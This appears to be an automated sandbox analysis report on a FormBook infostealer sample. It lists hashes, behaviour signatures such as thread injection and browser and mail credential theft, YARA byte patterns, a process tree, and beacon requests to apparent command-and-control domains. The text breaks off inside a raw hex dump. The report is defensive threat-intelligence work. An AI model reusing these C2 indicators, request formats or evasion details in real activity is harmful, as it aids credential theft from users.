Windows Analysis Report
YSjOEAta07.exe

Overview

General Information

Sample name:YSjOEAta07.exe
renamed because original name is a hash value
Original sample name:a16c70f7334f2e73756ea3dc716d70edaf138185d83289bcff6d65d43801408e.exe
Analysis ID:1528155
MD5:eb0f7c655c78976889355aa35a43dd38
SHA1:42238019d0febe523faa8b9d851292090ac9a409
SHA256:a16c70f7334f2e73756ea3dc716d70edaf138185d83289bcff6d65d43801408e
Tags:exeFormbookuser-adrian__luca

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • YSjOEAta07.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\YSjOEAta07.exe" MD5: EB0F7C655C78976889355AA35A43DD38)
    • svchost.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\YSjOEAta07.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • GmuPchEfAM.exe (PID: 1672 cmdline: "C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 7900 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • GmuPchEfAM.exe (PID: 6568 cmdline: "C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7296 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x32d87:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1ae56:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x172c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e3f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x164c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\YSjOEAta07.exe", CommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", ParentImage: C:\Users\user\Desktop\YSjOEAta07.exe, ParentProcessId: 7728, ParentProcessName: YSjOEAta07.exe, ProcessCommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", ProcessId: 7828, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\YSjOEAta07.exe", CommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", ParentImage: C:\Users\user\Desktop\YSjOEAta07.exe, ParentProcessId: 7728, ParentProcessName: YSjOEAta07.exe, ProcessCommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", ProcessId: 7828, ProcessName: svchost.exe
            No Suricata rule has matched

            AV Detection

            Source: YSjOEAta07.exeAvira: detected
            Source: YSjOEAta07.exeReversingLabs: Detection: 52%
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: YSjOEAta07.exeJoe Sandbox ML: detected
            Source: YSjOEAta07.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.1488514641.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455923509.000000000341A000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168342119.00000000006D7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.1488514641.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455923509.000000000341A000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168342119.00000000006D7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GmuPchEfAM.exe, 00000003.00000000.1411401209.00000000002BE000.00000002.00000001.01000000.00000004.sdmp, GmuPchEfAM.exe, 00000008.00000002.3167314647.00000000002BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.1389561003.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1387634356.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1490226852.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002DAE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1488017927.0000000000882000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.1389561003.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1387634356.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000003.1490226852.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002DAE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1488017927.0000000000882000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: replace.exe, 00000004.00000002.3172177851.000000000323C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000000.1558052270.0000000002CAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1780479653.00000000161AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: replace.exe, 00000004.00000002.3172177851.000000000323C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000000.1558052270.0000000002CAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1780479653.00000000161AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0014C230 FindFirstFileW,FindNextFileW,FindClose,4_2_0014C230
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then xor eax, eax4_2_00139AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then mov ebx, 00000004h4_2_009304E8
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 4x nop then pop edi8_2_050EB5F3
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 4x nop then xor eax, eax8_2_050F0B07

            Networking

            Source: DNS query: www.moritynomxd.xyz
            Source: DNS query: www.sterkus.xyz
            Source: Joe Sandbox ViewIP Address: 209.74.95.29 209.74.95.29
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /v5tr/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1tiXGxnpWKIlAMdpeetvztbm0D0P/FQ== HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.moritynomxd.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /kmgk/?EjLdUJJ=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzRzkSQpK8SApNFtkA5U4MUp6J2Mz6QQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.kovallo.cloudUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /becc/?EjLdUJJ=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1hpFW51KlNbBS8GqvLsVmQjui7pqzBw==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.sppsuperplast.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /fl4z/?EjLdUJJ=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzcp1KqIPIBJlEGfbNZZvmCXWpEmY6ZQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.tracy.clubUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /ha8h/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX6/3MPvQCQPMFuzfo+VK5cq25Wd2+yKQ== HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.sterkus.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /xx1z/?EjLdUJJ=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIRBLVhXVMqm8ByJItQpJ18i+00NseLA==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.syncnodex.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /lbpf/?EjLdUJJ=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK9wtqtHM6pRVxdkXmhbbPLR4PLxBAP1w==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.galaxyslot88rtp.latUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /kzas/?EjLdUJJ=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaJGgKmeWEiKc2IkdQLoOlpJ6MlzQWug==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.warriorsyndrome.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /uxh9/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW1yQztlFWqraTHnGITGOJIT5K53AYpg== HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.ks1x7i.vipUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /ml5l/?EjLdUJJ=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7q40+dEWWJZUlJWs+YYUwQiQqX1T+EQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.pakmartcentral.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kovallo.cloud
            Source: global trafficDNS traffic detected: DNS query: www.sppsuperplast.online
            Source: global trafficDNS traffic detected: DNS query: www.tracy.club
            Source: global trafficDNS traffic detected: DNS query: www.sterkus.xyz
            Source: global trafficDNS traffic detected: DNS query: www.syncnodex.net
            Source: global trafficDNS traffic detected: DNS query: www.galaxyslot88rtp.lat
            Source: global trafficDNS traffic detected: DNS query: www.warriorsyndrome.net
            Source: global trafficDNS traffic detected: DNS query: www.ks1x7i.vip
            Source: global trafficDNS traffic detected: DNS query: www.pakmartcentral.shop
            Source: global trafficDNS traffic detected: DNS query: www.les-massage.online
            Source: unknownHTTP traffic detected: POST /kmgk/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 196Cache-Control: no-cacheHost: www.kovallo.cloudOrigin: http://www.kovallo.cloudReferer: http://www.kovallo.cloud/kmgk/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:55:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:55:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:55:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:55:35 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <http://sppsuperplast.online/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Mon, 07 Oct 2024 13:55:45 GMTserver: LiteSpeedData Raw: 63 31 37 0d 0a 60 32 02 80 fc 3f 7d ad af c7 4d a5 c8 67 6c 91 01 84 e4 5f 22 8f f6 f3 fb c5 39 ef 20 b8 c8 24 08 f4 00 c5 f2 6a 54 d5 af a8 b7 e8 f7 fd df b4 f6 fc 41 b7 e6 58 6b e7 27 11 c9 25 b4 7a 75 0b a5 5f 6b 93 99 5c c8 ee f5 da 2c c5 21 d1 57 bb a2 2a 94 c2 a1 2c 0e 84 73 2c 87 d6 cd f9 4f 44 8c 10 f4 4a ab 44 08 70 ff de e2 ed 39 76 66 f4 aa a6 3a 8d de d4 11 1a c7 a5 b6 2d 09 3a 42 62 1d 79 0a bf 7d 90 f7 c0 e8 5f 9c b9 0f 10 eb 34 46 c8 1d 50 b9 de 3b a5 0d 54 bf ee 46 db f5 2d 75 be cd 47 65 f3 a2 30 59 31 6d db 86 8b e7 a3 6d e8 fb 19 f4 4f b6 37 3c 44 ea ac d1 16 f2 b1 33 be 17 b4 3f f7 a8 8c 8b 57 6f c3 fc f6 cd df 9b 8c be b3 73 ec 0c 9a ce b1 33 d4 71 15 f9 8e 77 90 d4 89 22 17 5f ee e5 a7 c6 b9 33 3b 35 39 5e 3f 85 35 9a 51 26 9d 18 3a b0 91 fe 13 c1 a7 66 e0 06 b2 1f 69 7c 88 c5 db a8 a3 81 f7 7e e6 57 c5 93 66 30 83 e5 1d 97 ff fe 93 ac 96 77 65 51 1c 93 9f e9 c7 7a 61 93 b7 79 d5 b1 f6 ae 71 31 ac 7f ce d1 d3 ba e3 23 d1 1d 6f 81 cc 51 3e 2e 5c aa 45 71 8c 68 9d 84 3c cb a7 52 6a 5c 4c 67 60 6f 56 87 7a 18 9c cc 63 df 39 09 82 1b a8 3d 1e 3b e5 59 4b 1b c8 12 e8 eb a3 38 af 9f 41 58 df 80 06 cc 34 d1 a4 e2 00 7b 70 e9 09 9d 6c 02 b0 35 65 78 0c ae 83 9c 87 00 31 e4 4f ca ff b5 e9 53 78 ff 05 7c dd c0 76 bb db 